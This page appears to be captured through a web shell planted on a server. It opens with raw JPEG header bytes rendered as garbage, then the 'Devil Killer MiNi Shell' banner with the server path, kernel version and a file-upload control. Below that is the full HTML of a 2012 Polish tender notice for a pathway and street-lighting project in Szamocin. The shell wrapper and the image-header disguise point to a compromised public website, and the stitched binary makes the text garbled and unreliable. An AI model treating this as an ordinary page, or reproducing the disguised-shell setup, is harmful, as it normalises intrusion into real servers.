JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120801/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120801/280394-N-2012.html

<p class="kh_header"><b>Szamocin: PRZEBUDOWA CIĄGU TURYSTYCZNEGO SZAMOCIN- LASKOWO</b><br>
<b>Numer ogłoszenia: 280394 - 2012; data zamieszczenia: 01.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Szamocin , Pl. Wolności 19, 64-820 Szamocin, woj. wielkopolskie, tel. 67 2848003, faks 67 2848065.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminaszamocin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEBUDOWA CIĄGU TURYSTYCZNEGO SZAMOCIN- LASKOWO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  PRZEBUDOWA CIĄGU TURYSTYCZNEGO SZAMOCIN-     LASKOWO Zgodnie ze Wspólnym Słownikiem Zamówień (CPV) przedmiot zamówienia obejmuje zakres określony kodami:
45.23.31.20-6 - Roboty drogowe
45230000-8 - Roboty budowlane w zakresie budowy rurociagów, linii komunikacyjnych i elektroenergetycznych   
ROZDZIAŁ V. Termin wykonania przedmiotu zamówienia
Termin wykonania przedmiotu zamówienia ustala się na: 30.11.2012 r.
CZĘŚĆ II. OPIS PRZEDMIOTU ZAMÓWIENIA. 
W ramach przedsięwzięcia wykonany zostanie chodnik z kostki brukowej wzdłuż ulic Smolary, Rolnej, Polnej w Szamocinie oraz Żeglarskiej, Szamocińskiej i Brzegowej w Laskowie. Na ulicach Smolary, Rolnej, Polnej w Szamocinie oraz na ulicy Żeglarskiej w Laskowie zostanie zamontowane oświetlenie. Od ulicy Żeglarskiej w Laskowie zostanie odtworzony szlak turystyczny żwirowy do jeziora Siekiera w Szamocinie. Dokumentacja projektowa dzieli zadania na etapy obejmujące:

ETAP I- ulica Polna do ronda w Laskowie ul. Żeglarska 1240 m oraz szlak turystyczny od Laskowa  do jeziora Siekiera w Szamocinie 1028,50 m

- Opis sytuacji- Przebudowa ciągu turystycznego polega na odtworzeniu ciągu turystycznego wzdłuż drogi gminnej po stronie lewej na odcinku od skrzyżowania z ulicą Margonińską w Szamocinie do ronda w Laskowie oraz na utwardzeniu szlaku turystycznego od Laskowa do jeziora Siekiera w Szamocinie. Długość ciągu turystycznego wynosi 1240,00m a szlaku turystycznego 1028,50m. Dodatkowo projektuje się odtworzenie odcinka ciągu turystycznego w rejonie ronda o długości około 20,00m który łączy dwa istniejące przejścia dla pieszych.
W ramach przebudowy ciągu turystycznego przewiduje się również wykonanie nowej nawierzchni zjazdów na drogi o nawierzchni gruntowej, na posesje i na miejsca postojowe tylko w zakresie szerokości ciągu. Przebieg ciągu i szlaku turystycznego przedstawiono na rysunkach nr 2.1; 2.2; 2.3; 2.4; 2.5; 2.6 - plan sytuacyjny.
- Niweleta- Niweletę projektowanego ciągu turystycznego poprowadzono równolegle podnosząc o 12 cm w stosunku do krawędzi istniejącej jezdni. Niweletę szlaku turystycznego poprowadzono zasadniczo po terenie poza odcinkiem od km 0 + 240,00 do km 0 + 360,00 na którym należy złagodzić pochylenie podłużne.
- Przekrój normalny- Przyjęto ciąg turystyczny o szerokości 1,60m ze spadkiem poprzecznym w kierunku istniejącej jezdni o i = 2,0%. Wyjątek stanowi odcinek w rejonie punktu F gdzie pochylenie poprzeczne będzie w kierunku granicy działek. Szerokość ciągu turystycznego
w rejonie ronda wynosi 1,00m.
Konstrukcja nawierzchni ciągu turystycznego to:
podsypka cementowo - piaskowa grubości 5 cm w stosunku 1 : 4
nawierzchnia z kostki brukowej betonowej wibroprasowanej grubości 6 cm koloru szarego
Konstrukcja nawierzchni zjazdów na posesje:
podsypka piaskowa grubości 10 cm podbudowa grubości 15 cm z kruszywa łamanego
stabilizowanego mechanicznie
podsypka cementowo - piaskowa grubości 5 cm w stosunku 1 : 4
zjazd z kostki brukowej betonowej wibroprasowanej grubości 8 cm koloru czerwonego
Obramowanie ciągu turystycznego stanowić będzie obrzeże betonowe 8 x 30cm od strony posesji natomiast od strony jezdni krawężnik betonowy 15 x 30 cm. W miejscach zjazdów na posesje krawężnik należy obniżyć do 2 cm ponad poziom jezdni.
Przyjęto szlak turystyczny o szerokości 2,00m ze spadkiem poprzecznym jednostronnym i = 2,0% w kierunku lewym zgodnie z ukształtowaniem terenu. Konstrukcja szlaku turystycznego to warstwa gr. 15 cm ze żwiru ułożona bez
obramowań po uprzednim wyprofilowaniu terenu. Konstrukcję ciągu i szlaku turystycznego przedstawiono na rysunku nr 3 - przekroje normalne.
- Odwodnienie- Wody opadowe z powierzchni ciągu i szlaku turystycznego odprowadzane będą grawitacyjnie poprzez nadane spadki podłużne i poprzeczne.
Na początku ciągu turystycznego w rejonie istniejącego przepustu należy wykonać studzienkę ściekową z rur PVC o400 z przykanalikiem z rur PVC o160 oraz odmulić istniejące rowy przydrożne na długości 60,00m i oczyścić przepust betonowy.
- Roboty ziemne- Roboty ziemne na ciągu turystycznym sprowadzają się do profilowania podłoża gruntowego i podcięcia skarpy na odcinku drogi biegnącej w wykopie. W związku z utworzeniem skarpy o dużym pochyleniu należy zabezpieczyć ja geosiatką mocowaną szpilkami do gruntu. Inwestor określi typ geosiatki. Roboty ziemne na szlaku turystycznym sprowadzają się również do profilowania podłoża gruntowego oraz przesunięcia mas ziemnych od km 0+240,00 do km          0+360,00 w celu złagodzenia spadku podłużnego szlaku.
ETAP II- Wykonanie ciągu turystycznego ul. Żeglarska, Szamocińska, Brzegowa 294,50 m
- Opis sytuacji- Przebudowa ciągu turystycznego stanowi wydłużenie projektowanego ciągu ujętego w opracowaniu z lutego 2011 i polega na odtworzeniu chodnika wzdłuż drogi gminnej w kierunku na północ po stronie prawej na odcinku od ronda do skrzyżowania z wyspą i dalej w kierunku na zachód po stronie lewej od skrzyżowania z wyspą do mostu. Długość ciągu turystycznego w zakresie drugiego etapu wynosi: odcinek A-C 202,5 m + odcinek B-D 92,0 m = 294,5 m .W ramach niniejszej przebudowy przewiduje się również wykonanie nowej nawierzchni zjazdów na posesje. Przebieg ciągu turystycznego przedstawiono na rysunku nr 2 - plan sytuacyjny.
- Niweleta- Niweletę projektowanego ciągu turystycznego poprowadzono równolegle podnosząc o 12 cm w stosunku do krawędzi istniejącej jezdni.
-Przekrój normalny- Przyjęto ciąg turystyczny o szerokości 1,50 m ze spadkiem poprzecznym w kierunku istniejącej jezdni o i = 2,0%.
Konstrukcja nawierzchni ciągu turystycznego to:
podsypka cementowo - piaskowa grubości 5 cm w stosunku 1 : 4
nawierzchnia z kostki brukowej betonowej wibroprasowanej grubości 6 cm koloru szarego
Konstrukcja nawierzchni zjazdów na posesje:
 podsypka piaskowa grubości 10 cm
podbudowa grubości 15 cm z kruszywa łamanego stabilizowanego mechanicznie
podsypka cementowo - piaskowa grubości 5 cm w stosunku 1 : 4
zjazd z kostki brukowej betonowej wibroprasowanej grubości 8 cm koloru czerwonego
Obramowanie ciągu turystycznego stanowić będzie obrzeże betonowe 8 x 30cm od strony posesji natomiast od strony jezdni krawężnik betonowy 15 x 30 cm. W miejscach zjazdów na posesje krawężnik należy obniżyć do 2 cm ponad poziom jezdni. Konstrukcję ciągu turystycznego przedstawiono na rysunku nr 3 - przekrój normalny.
- Odwodnienie- Wody opadowe z powierzchni ciągu i szlaku turystycznego odprowadzane będą grawitacyjnie poprzez nadane spadki podłużne i poprzeczne.- Roboty ziemne- Roboty ziemne (wykop) związane są z wykonaniem koryta pod konstrukcję nawierzchni projektowanego ciągu turystycznego i zjazdów na posesje.
ETAP III- Wykonanie ciągu turystycznego ul. Smolary i Rolna 1260 m
- Opis sytuacji- Ciąg turystyczny projektuje się wzdłuż ulicy Smolary i ulicy Rolnej w Szamocinie poza pasem drogowym za wyjątkiem odcinka w rejonie ogródków działkowych. Wzdłuż ulicy Smolary na odcinku A-B ciąg turystyczny biegnie po stronie prawej, a na odcinku B-C po stronie lewej pasa drogowego i dalej wzdłuż ulicy Rolnej po stronie prawej na odcinku C-D i po stronie lewej na odcinku D-E. Całkowita długość projektowanego ciągu turystycznego wynosi 1260,0 m licząc do osi ulicy Margonińskiej. W ramach przebudowy ciągu turystycznego przewiduje się również wykonanie nowej nawierzchni zjazdów na drogi o nawierzchni gruntowej i na posesje. Przebieg ciągu turystycznego przedstawiono na rysunkach nr 2.1; 2.2; 2.3; 2.4 - plan sytuacyjny.
-Niweleta- Niweletę projektowanego ciągu turystycznego na odcinku A-B i B-C poprowadzono po istniejącym terenie niezależnie od niwelety istniejącej jezdni, a na odcinku C-D i D-E poprowadzono równolegle w stosunku do krawędzi istniejącej jezdni.
Projektowaną niweletę krawędzi ciągu turystycznego od strony jezdni pokazano na rysunku nr 5 - przekrój podłużny.
- Przekrój normalny- Przyjęto ciąg turystyczny o szerokości 1,50 m ze spadkiem poprzecznym w kierunku istniejącej jezdni o i = 2,0%. Wyjątek stanowi odcinek A-B, gdzie pochylenie poprzeczne będzie w kierunku przeciwnym.
Konstrukcja nawierzchni ciągu turystycznego to:
podsypka cementowo - piaskowa grubości 5 cm w stosunku 1 : 4
nawierzchnia z kostki brukowej betonowej wibroprasowanej grubości 6 cm koloru szarego
Konstrukcja nawierzchni zjazdów na posesje:
podsypka piaskowa grubości 10 cm
podbudowa grubości 15 cm z kruszywa łamanego
stabilizowanego mechanicznie
podsypka cementowo
piaskowa grubości 5 cm w stosunku 1 : 4
zjazd z kostki brukowej betonowej wibroprasowanej grubości 8 cm koloru czerwonego
Obramowanie ciągu turystycznego stanowić będzie obrzeże betonowe 8 x 30cm od strony posesji natomiast od strony jezdni krawężnik betonowy 15 x 30 cm. W miejscach zjazdów na posesje krawężnik należy obniżyć do 2 cm ponad poziom jezdni. Konstrukcję ciągu turystycznego przedstawiono na rysunkach nr 3.1 i 3.2 - przekroje normalne.
- Odwodnienie- Wody opadowe z powierzchni ciągu turystycznego odprowadzane będą grawitacyjnie poprzez nadane spadki podłużne i poprzeczne. Na odcinku C-D wody opadowe z powierzchni istniejącej jezdni i projektowanego ciągu turystycznego odbierać będzie projektowany kolektor deszczowy z rur PP o średnicy 300 mm ze studzienkami rewizyjnymi z rur PVC o średnicy 400 mm i studzienkami ściekowymi również z rur PVC o średnicy 400 mm i przykanalikami z rur PVC o średnicy 160 mm. Również na odcinku C-D po stronie prawej wzdłuż projektowanego ciągu
turystycznego zaprojektowano ściek szerokości 30 cm z kostki brukowej betonowej grubości 8 cm.Lokalizację urządzeń odwadniających oraz sposób odprowadzenia wód z powierzchni projektowanego ciągu turystycznego pokazano na rysunkach nr 4.1, 4.2 - plan sytuacyjny-kanalizacja deszczowa oraz na rysunku nr 5 - przekrój podłużny.
- Roboty ziemne- Roboty ziemne (wykop) związane są z wykonaniem koryta pod konstrukcję nawierzchni projektowanego ciągu turystycznego i zjazdów na posesje.
PRZEBUDOWA OŚWIETLENIA DROGOWEGO- Szamocin ul. Rolna i ul. Smolary
- Zakres projektu- Przebudowa oświetlenia drogowego w Szamocinie ul. Rolna i ul. Smolary.
- Zasilanie oświetlenia- Zgodnie z warunkami przyłączenia zasilanie projektowanego oświetlenia drogowego należy wykonać :
Szamocin, ul. Rolna - z istniejącej stacji transformatorowej nr 03-0859.
Szamocin, ul. Smolary - z istniejącej stacji transformatorowej nr 03-0745.
Przyłącza i złącza kablowo- pomiarowe ZKP-10.1 wykona ENEA wg własnych projektów. Obok złączy ustawić szafki oświetleniowe SO. Połączenie szafek SO z złączami wykonać kablem YAKY 4x25mm2
- Przebudowa oświetlenia drogowego- Przebudowę oświetlenia drogowego zaprojektowano oprawami sodowymi typu SGS102 SON-T 100W montowanymi na słupach stalowych ocynkowanych, cylindrycznych stożkowych S-90 z wysięgnikami .ST.-W-1,5m. Słupy należy ustawić na fundamentach betonowych, prefabrykowanych . We wnękach słupów zamontować złącza oświetleniowe IZO składające się z :
1. Złącza zerowego ZK-2-03 szt. 1
2. Izolacyjnego złącza fazowego IZK-2-02 szt. 2
3. Izolacyjnego złącza bezpiecznikowego IZK-2-01 szt. 1
Dopuszcza się zastosowanie tabliczek bezpiecznikowych zamiast złącz IZO.
Połączenie opraw od złącz umieszczonych w wnękach słupów wykonać przewodem YDY 3x2,5.750V.
Zasilanie oświetlenia ulicy zaprojektowano linia kablowa wykonana kablem YAKY 4x25mm2  ułożonym w ziemi na głębokości 70 cm. W rowie kabel ułożyć na 10 cm warstwie piasku, a następnie po nasypaniu 10cm warstwy piasku i 15 cm gruntu rodzimego oznaczyć folia koloru niebieskiego. Skrzyżowanie kabli energetycznych z kablami telekomunikacyjnymi, NN-0,4kV, rurociągami, drogami wykonać w rurze osłonowej AROT SRS 110. Zachować odległości kabla ułożonego w ziemi od innych kabli i urządzeń podziemnych (pionowa przy skrzyżowaniu i pozioma przy zbliżeniu) zgodnie z norma PN-76.E-05125. Wykopy należy wykonać ręcznie zachowując szczególna ostrożność przy skrzyżowaniu kabli z innymi urządzeniami podziemnymi. Plany przebudowy oświetlenia drogowego pokazano na rys. E-1 i E-2, a schematy ideowe przebudowy oświetlenia drogowego na rys. E-3 i E-4. Przed rozpoczęciem robót zawiadomić wszystkich właścicieli i użytkowników urządzeń podziemnych w celu właściwego nadzorowania robót oraz uzyskać zgodę Gminy w Szamocinie na prowadzenie robót w pasie drogowym. Wykonawca jest zobowiązany do bezwzględnego zastosowania się do wszystkich zaleceń i warunków zgłoszonych przez poszczególne branże w opinii ZUD dot. uzgodnienia dokumentacji projektowej. Po wybudowaniu wykonać inwentaryzacją geodezyjną linii kablowej, słupów i innych urządzeń elektrycznych.
- Szafki oświetleniowe SO- Aparaturę do zabezpieczenia i sterowania oświetleniem drogowym zamontować w szafkach SO. Obudowa szafek wolno stojąca z poliestru typu OP-58DF. Wyposażenie i schematy ideowe połączeń pokazano na rys. E-3 i E-4.PRZEBUDOWA OŚWIETLENIA DROGOWEGO- Szamocin ul. Polna, Laskowo ul. Żeglarska
- Zakres projektu- Przebudowa oświetlenia drogowego Laskowo ul. Żeglarska i Szamocin ul. Polna.
- Zasilanie oświetlenia- Zgodnie z warunkami przyłączenia zasilanie projektowanego oświetlenia drogowego należy wykonać:
Laskowo, ul. Żeglarska- od istniejącego słupa oświetleniowego nr 5 ( przy działce375.7). Obwód wyprowadzony linią kablową 0,4 kV z istniejącej szafki oświetleniowej SO przy stacji transformatorowej 15.04 kV nr 03-0732. Zabezpieczenie obwodu i sterowanie oświetleniem istniejące, w szafce SO- bez zmian.
Szamocin, ul. Polna- z istniejącego obwodu oświetleniowego na słupie N-10.ŻN przy ul. Polnej 18, kablem YAKY 4x25 mm2 do projektowanego słupa oświetleniowego nr 1. Zabezpieczenie obwodu i sterowanie oświetleniem w szafce SO stacji tr. 03-0907- istniejące, bez zmian.
-Przebudowa oświetlenia drogowego- Przebudowę oświetlenia drogowego zaprojektowano oprawami sodowymi typu SGS102SON-T 100W montowanymi na słupach stalowych ocynkowanych, cylindrycznych- stożkowych S-90 z wysięgnikami .ST.-W-1,5m. Słupy należy ustawić na fundamentach betonowych, prefabrykowanych. We wnękach słupów zamontować złącza oświetleniowe IZO składające się z:
1. Złącza zerowego ZK-2-03  szt. 1
2. Izolacyjnego złącza fazowego IZK-2-02  szt. 2
3. Izolacyjnego złącza bezpiecznikowego IZK- 2-01 szt. 1
Dopuszcza się zastosowanie tabliczek bezpiecznikowych zamiast złącz IZO.
Połączenie opraw od złącz umieszczonych w wnękach słupów wykonać przewodem YDY 3x2,5.750V.
Zasilanie oświetlenia ulicy zaprojektowano linią kablową wykonaną kablem YAKY 4x25 mm2 ułożonym w ziemi na głębokości 70 cm. W rowie kabel ułożyć na 10 cm warstwie piasku, a następnie po nasypaniu 10cm warstwy piasku i 15 cm gruntu rodzimego oznaczyć folią koloru niebieskiego. Skrzyżowanie kabli energetycznych z kablami telekomunikacyjnymi, NN-0,4kV, rurociągami, drogami wykonać w rurze osłonowej AROT SRS 110. Za chować odległość kabla ułożonego w ziemi od innych kabli i urządzeń podziemnych (pionowa przy skrzyżowaniu i pozioma przy zbliżeniu) zgodnie z normą PN-76.E- 05125. Wykopy należy wykonać ręcznie zachowując szczególną ostrożność przy skrzyżowaniu kabli z innymi urządzeniami podziemnymi.
Plany przebudowy oświetlenia drogowego pokazano na rys. E-1 i E-2, a schematy ideowe przebudowy oświetlenia drogowego na rys. E-3 i E-4.
Przed rozpoczęciem robót zawiadomić wszystkich właścicieli i użytkowników urządzeń podziemnych w celu właściwego nadzorowania robót oraz uzyskać zgodę Gminy w Szamocinie na prowadzenie robót w pasie drogowym. Wykonawca jest zobowiązany do bezwzględnego zastosowania się do wszystkich zaleceń ZUD dot. uzgodnienia dokumentacji projektowej. Po wybudowaniu wykonać inwentaryzację geodezyjną linii kablowej, słupów i innych urządzeń elektrycznych.
Dokumentacja geodezyjna (inwentaryzacja) wszystkich prac, zatwierdzona przez 
odpowiedni z uwagi na lokalizację robót urząd geodezji i kartografii - Powiatowy 
Ośrodek Dokumentacji Geodezyjnej i Kartograficznej w Chodzieży, ul. Wiosny Ludów l (cena za sporządzenie dokumentów powykonawczych powinna być  wkalkulowana w pozycje jednostkowe zawarte w kosztorysach ofertowych w/w  zadań).
Całość prac należy wykonać w oparciu o posiadane przez inwestora projekty budowlane.
Nazwy własne, które pojawiają się w przedmiarach robót, określają minimalny standard jakościowy materiału lub urządzenia przyjętego do wyceny.
UWAGA: zaproponowane w ofercie elementy - materiały powinny być takie same lub równoważne i odpowiadać parametrom technicznym, funkcjonalnym i użytkowym narzuconym przez zamawiającego w przedmiarach i projekcie budowlanym.
Szczegółowy zakres rzeczowy robót do wykonania określają:
1) przedmiary (kosztorysy ofertowe) robót  
    wartości jednostkowych, wyszczególnionych w poszczególnych pozycjach robót 
    musi stanowić wartość końcową, zapisaną na druku oferty,
2) projekt budowlany obejmujący swoim zakresem   przedmiot zamówienia i 
    specyfikacja techniczna wykonania i odbioru robót; oryginał w wersji papierowej 
    projektu technicznego jest do wglądu u Zamawiającego,
Przedmiot zamówienia obejmuje również wszystkie prace i obowiązki wykonawcy wymienione we wzorze umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>UWAGA: dotycząca robót dodatkowych i zamówień uzupełniających:
1. Jeżeli konieczność robót dodatkowych wynika z decyzji organów nadzoru 
    budowlanego lub jest następstwem błędów lub zaniedbań Wykonawcy, prace takie 
    zostaną wykonane  przez Wykonawcę bez dodatkowego wynagrodzenia - w   
    terminach wynikających z wydanej decyzji i obowiązującej umowy.
2. W przypadku (konieczności) udzielenia dotychczasowemu wykonawcy robót 
    dodatkowych nieobjętych zamówieniem podstawowym maj ą zastosowanie 
    przepisy art. 67. ust. l, pkt 5 PZP. Wykonawca takich prac zobowiązany jest 
    wykonać je przy zachowaniu tych samych  stawek kalkulacyjnych, norm, 
    parametrów i standardów, po podpisaniu przez obie strony 
    umowy ustalającej zakres rzeczowy, finansowy i termin wykonania.
3. Wynagrodzenie za roboty, o których mowa w ust.2 będzie ustalone kosztorysem 
     powykonawczym potwierdzonym przez Zamawiającego i Inspektora Nadzoru.
4. Zamawiający dopuszcza w okresie 3 lat od podpisania umowy, udzielenia 
    niezbędnego, uzasadnionego zamówienia uzupełniającego, zgodnie z przepisami 
    zapisanymi w art. 41, pkt. 15 i art. 67 ust. l pkt 6 i 7 ustawy PZP. 
 Określa się wartość zamówienia uzupełniającego do 50 % wartości umowy 
 podstawowej.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 20.000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy załączyć kopie uprawnień do wykonywania określonej działalności jeżeli przepisy prawa nakładają taki obowiązek ich posiadania. Spełnienie tego warunku udziału w postępowaniu zamawiający oceni zgodnie z formułą spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>realizowali w ciągu ostatnich 5 lat co najmniej 1 zamówienie odpowiadające swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączenia dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Za robotę budowlaną o podobnym zakresie i wartości zamawiający uzna budowę, przebudowę lub rozbudowę polegającą na  ułożeniu w  jednym zadaniu min. 4000 m2 kostki  brukowej betonowej oraz montażu 40  opraw oświetleniowych ; udokumentowane referencjami  i   kopią  protokołu bezusterkowego  odbioru od  Inwestora. Referencje i protokoły odbioru  mogą być przedłożone  oddzielnie na  kostkę brukowa  i oddzielnie na  oprawy oświetleniowe. Jednocześnie  należy  przedłożyć  referencje  i  kopię  protokołu bezusterkowego  odbioru na zadanie o wartość  co najmniej 1.000000,00  zł. Spełnienie tego warunku udziału w postępowaniu zamawiający oceni zgodnie z formułą spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jeśli dysponują sprzętem budowlanym, środkami transportu i urządzeniami technicznymi  w ilościach i o parametrach niezbędnych do realizacji zamówienia,  zgodnie z nakładami kosztorysu ofertowego, projektem budowlanym (oświadczenie wg  wzoru  Wykonawcy).
- dysponują lub będą dysponować osobą pełniącą funkcję kierownika budowy posiadającą (posiadającymi) uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994r Prawo budowlane (t.j. Dz.U z 2006r nr 156, poz.1118 ze zm. ) do kierowania robotami budowlanymi  w specjalności drogowej w zakresie wymaganym do realizacji zadania. Spełnienie tego warunku udziału w postępowaniu zamawiający oceni zgodnie z formułą spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
